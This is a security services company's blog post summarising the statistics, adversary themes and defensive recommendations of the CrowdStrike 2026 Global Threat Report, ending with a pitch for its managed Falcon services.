The Year of the Evasive Adversary: Key Takeaways from the CrowdStrike 2026 Global Threat Report
As the cybersecurity threat landscape continues to increase in both complexity and speed, staying informed is critical for security teams and business leaders alike. At Echelon, we closely follow CrowdStrike’s annual Global Threat Report, which represents one of the most authoritative sources of data-driven threat intelligence, informed by CrowdStrike’s Intelligence and Falcon OverWatch teams monitoring adversary activity across millions of endpoints worldwide.
As a CrowdStrike strategic partner, Echelon leverages the Falcon platform to deliver tech-enabled managed security services and integrates CrowdStrike’s intelligence into our operations to help clients stay ahead of breaches. Each year, this report provides actionable insight into where adversaries are focusing their efforts and what defenders must prioritize to respond effectively.
This year’s report is titled "Year of the Evasive Adversary “ for a reason. In 2025, attackers didn’t just accelerate their operations; they refined how they evade detection.
What Changed in the 2025 Threat Landscape
Before exploring the key themes, it is critical to understand the scale of activity CrowdStrike observed in 2025. The following headline statistics illustrate the magnitude of the challenge:
- 89% increase in attacks by AI-enabled adversaries year-over-year
- Average eCrime breakout time dropped to just 29 minutes, a 65% speed increase from 2024, with the fastest observed breakout clocking in at only 27 seconds
- 82% of detections were malware-free, up from 51% in 2020, meaning attackers are increasingly operating through legitimate tools and credentials rather than traditional malware
- 37% rise in cloud-conscious intrusions, with a staggering 266% increase among named state-nexus threat actors
- 42% increase in zero-day vulnerabilities exploited before public disclosure
- China-nexus activity increased 38% across all sectors, with an 85% surge in attacks targeting logistics
- 24 new adversaries named in 2025, bringing the total tracked by CrowdStrike to 281
These figures are not just alarming in isolation; they reflect a broader shift in adversary tradecraft. Attackers are operating faster, leveraging trusted channels, and increasingly augmenting their capabilities with AI.
Key Adversary Themes from 2025
Adversaries Are Leveraging AI to Enhance and Accelerate Attacks
Artificial intelligence is no longer just a defensive tool, adversaries are actively weaponizing AI to enhance attack scale, speed, and effectiveness, and the data supports it.
An 89% increase in attacks by AI-enabled adversaries year-over-year was noticed this year, with threat actors using AI to accelerate phishing, generate malware, produce post-exploitation scripts, and fabricate convincing fake personas for social engineering.
Attackers are increasingly targeting AI systems directly by exploiting vulnerabilities in development platforms, deploying malicious MCP servers that impersonate legitimate services, and introducing poisoned packages designed to hijack AI tooling and extract credentials. As organizations adopt AI, these platforms and their integrations must be treated as part of the enterprise attack surface.
Ransomware Adversaries Are Expanding Cross-Domain Tradecraft
Big Game Hunting (BGH) ransomware groups remained the dominant eCrime threat in 2025, but their tactics have shifted away from traditional endpoint-based attacks.
Sophisticated threat groups such as SCATTERED SPIDER, BLOCKADE SPIDER, and PUNK SPIDER are deliberately operating in areas with limited or no EDR coverage, including unmanaged VMs, VMware ESXi infrastructure, SaaS applications, and cloud environments, enabling data encryption and exfiltration without interacting with managed endpoints.
PUNK SPIDER alone conducted 198 intrusions in 2025, a 134% year-over-year increase. The core lesson is clear: fragmented visibility across tools and teams creates the exact conditions adversaries are designed to exploit.
China-Nexus Threat Actors Are Targeting Network Perimeter Devices
China-linked adversaries increased activity by 38% in 2025, with a clear preference for internet-facing perimeter devices like VPNs, firewalls, and gateways—systems where patching is often inconsistent.
Exploitation timelines are measured in days, not weeks, with actors weaponizing new vulnerabilities within 2 to 6 days of disclosure and maintaining access for up to 22 months in some cases.
Logistics (up 85%), telecommunications (up 30%), and financial services (up 20%) were the most targeted sectors, and CrowdStrike expects this edge-focused strategy to continue into 2026.
Supply Chain Attacks Are Enabling Evasion of Traditional Security Controls
Rather than targeting organizations directly, adversaries in 2025 increasingly compromised upstream software providers, development ecosystems, and trusted code repositories.
A notable example is North Korea-linked PRESSURE CHOLLIMA, which executed the largest cryptocurrency theft in history, stealing $1.46 billion by compromising a developer workstation, pivoting into a wallet platform’s cloud environment, and covertly redirecting transactions to an attacker-controlled wallet, all through trusted software paths.
These attacks weaponize trust in legitimate software, allowing malicious activity to operate under the guise of authenticity and evade detection without robust code signing, dependency validation, and third-party risk controls.
Zero-Day Exploitation Is Rising Across All Threat Actor Types
CrowdStrike observed a 42% year-over-year increase in zero-day vulnerabilities exploited before public disclosure in 2025, continuing a multi-year upward trend.
Nation-state actors continue to prioritize zero-day vulnerabilities in edge devices and public-facing infrastructure to establish long-term persistence, while financially motivated groups target internet-facing enterprise applications to maximize data exfiltration at scale.
With exploitation timelines shrinking, aggressive patching cadences, proactive threat hunting, and cross-domain detection capabilities are critical to reducing exposure before adversaries can act.
Adversaries Are Subverting Trust in Cloud Platforms and Services
Cloud-conscious intrusions increased by 37% in 2025, with adversaries increasingly bypassing traditional compromise methods in favor of identity-centric techniques.
Adversaries are exploiting trust in cloud identity systems, SaaS integrations, and authentication flows by leveraging valid credentials, compromised identity providers, and stolen OAuth tokens to gain access without triggering traditional intrusion signals.
Valid account abuse accounted for 35% of all cloud incidents. Groups like SCATTERED SPIDER and BLOCKADE SPIDER targeted hybrid identity solutions to gain enterprise-wide privileged access, while Russia-linked COZY BEAR ran elaborate multi-channel social engineering campaigns directing victims to enter credentials on legitimate Microsoft login pages.
What This Means for Organizations in 2026
The CrowdStrike 2026 report closes with seven recommendations, all of which map to the themes above. At Echelon, these recommendations align closely with the services we deliver to clients every day:
- Secure AI to reduce emerging business and operational risk. Treat AI as part of the attack surface by governing usage, monitoring interactions, enforcing access controls, and mitigating risks like prompt injection, data exfiltration, and model abuse.
- Treat identity and SaaS as primary attack surfaces. Elevate phishing-resistant MFA, least-privilege access, and SaaS activity monitoring to baseline controls in response to identity-driven, malware-free attacks.
- Eliminate cross-domain blind spots. Close security gaps with centralized telemetry and integrated XDR/SIEM to ensure visibility across cloud, identity, and unmanaged assets.
- Secure the software supply chain and developer workflows. Make code signing, dependency validation, and developer environment hardening standard to maintain software integrity and prevent tampering.
- Prioritize edge device and perimeter patching and monitoring. Patch critical vulnerabilities within 72 hours and enforce logging, monitoring, and segmentation to reduce exposure and limit lateral movement.
- Prioritize proactive threat intelligence and hunting. Use intelligence-driven hunting and behavioral analysis to detect fast-moving threats that bypass reactive controls.
- Strengthen human resilience against social engineering. Combine security awareness, tabletop exercises, and adversary simulations to defend against increasingly effective social engineering attacks.
How Echelon Can Help
The threats outlined in this report are not theoretical, they reflect what our clients encounter daily. The most common challenge is not a lack of technology, but a lack of operationalization, creating gaps that adversaries are specifically designed to exploit.
How we help close those gaps:
- Turn underutilized tools into fully operational security controls
- Identify and remediate misconfigurations across identity, cloud, and endpoint environments
- Eliminate alert fatigue with tuned detections and managed response
- Operationalize CrowdStrike Falcon across EDR/XDR, SIEM, Identity, Cloud, and Spotlight
- Support deployment health checks, full implementations, and platform migrations
- Deliver ongoing managed security operations backed by certified Falcon experts
- Maximize ROI from existing security investments
As a member of CrowdStrike’s Elevate Partner Program, our engineers hold the full breadth of Falcon certifications including CCFA, CCFR, CCFH, CCSE, CCIS, and CCCS, bringing deep, platform-wide expertise to help organizations maximize the value of their investment.
To learn more about how Echelon and CrowdStrike work together, visit our CrowdStrike Strategic Partner page or explore our CrowdStrike Platform Services.
If you'd like to talk through how the 2025 threat landscape applies to your organization specifically, start the conversation with our team. And if you would like to read the full CrowdStrike 2026 Global Threat Report yourself, we encourage you to download it here.